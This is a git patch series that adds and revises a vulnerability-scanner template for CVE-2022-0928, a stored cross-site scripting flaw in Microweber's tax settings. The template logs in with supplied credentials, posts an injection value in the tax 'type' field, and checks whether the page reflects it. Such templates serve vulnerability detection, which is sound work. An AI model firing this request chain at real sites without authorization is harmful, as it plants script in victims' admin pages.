From 39e29232e79952e56f5856726d655633f306c1dd Mon Sep 17 00:00:00 2001 From: amit-jd <78851976+amit-jd@users.noreply.github.com> Date: Sun, 14 Aug 2022 17:33:29 +0530 Subject: [PATCH 1/4] Create CVE-2022-0928 --- cves/2022/CVE-2022-0928.yaml | 54 ++++++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 cves/2022/CVE-2022-0928.yaml diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml new file mode 100644 index 0000000000..7c042f96b5 --- /dev/null +++ b/cves/2022/CVE-2022-0928.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0928 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS. + reference: + - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd + - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0928 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H + cvss-score: 6.8 + cwe-id: CWE-79 + tags: cve,cve2022,xss,microweber,CMS + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/shop/save_tax_item HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:settings + + id=0&name=vat1&type=">&rate=10 + + - |- + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer:{{BaseURL}}admin/view:settings + + class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - contains(body_2,'true') + - 'contains(body_3,"alert(document.domain)")' + - 'contains(all_headers_3,"text/html")' + - 'status_code_2==200' + - 'status_code_3==200' + condition: and \ No newline at end of file From 57f60dbbec8b3885076dbedfffb13551becc964c Mon Sep 17 00:00:00 2001 From: amit-jd <78851976+amit-jd@users.noreply.github.com> Date: Sun, 14 Aug 2022 18:09:27 +0530 Subject: [PATCH 2/4] Update CVE-2022-0928.yaml --- cves/2022/CVE-2022-0928.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml index 7c042f96b5..fc162c806d 100644 --- a/cves/2022/CVE-2022-0928.yaml +++ b/cves/2022/CVE-2022-0928.yaml @@ -47,8 +47,8 @@ requests: - type: dsl dsl: - contains(body_2,'true') - - 'contains(body_3,"alert(document.domain)")' + - 'contains(body_3,"alert(document.domain)")' - 'contains(all_headers_3,"text/html")' - 'status_code_2==200' - - 'status_code_3==200' - condition: and \ No newline at end of file + - 'status_code_3==200' + condition: and From dbcff2cfd8c540892312585c8675d6f4de4f7af1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 16 Aug 2022 21:12:47 +0530 Subject: [PATCH 3/4] Update CVE-2022-0928.yaml --- cves/2022/CVE-2022-0928.yaml | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml index fc162c806d..0d924976a6 100644 --- a/cves/2022/CVE-2022-0928.yaml +++ b/cves/2022/CVE-2022-0928.yaml @@ -11,10 +11,10 @@ info: - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a - https://nvd.nist.gov/vuln/detail/CVE-2022-0928 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H - cvss-score: 6.8 - cwe-id: CWE-79 - tags: cve,cve2022,xss,microweber,CMS + cve-id: CVE-2022-0928 + metadata: + verified: true + tags: cve,cve2022,xss,microweber,cms requests: - raw: @@ -29,15 +29,15 @@ requests: POST /api/shop/save_tax_item HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:settings + Referer: {{BaseURL}}/admin/view:settings id=0&name=vat1&type=">&rate=10 - |- - POST /module/ HTTP/1.1 + POST /module HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer:{{BaseURL}}admin/view:settings + Referer:{{BaseURL}}/admin/view:settings class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes @@ -46,9 +46,7 @@ requests: matchers: - type: dsl dsl: - - contains(body_2,'true') - - 'contains(body_3,"alert(document.domain)")' + - contains(body_3,'\">') - 'contains(all_headers_3,"text/html")' - - 'status_code_2==200' - - 'status_code_3==200' + - 'status_code==200' condition: and From 07fca3d5cba9518d8210ae0426586bae7f4b34eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Aug 2022 14:48:53 +0530 Subject: [PATCH 4/4] Update CVE-2022-0928.yaml --- cves/2022/CVE-2022-0928.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml index 0d924976a6..3e8eb94d32 100644 --- a/cves/2022/CVE-2022-0928.yaml +++ b/cves/2022/CVE-2022-0928.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2022-0928 metadata: verified: true - tags: cve,cve2022,xss,microweber,cms + tags: cve,cve2022,xss,microweber,cms,authenticated requests: - raw: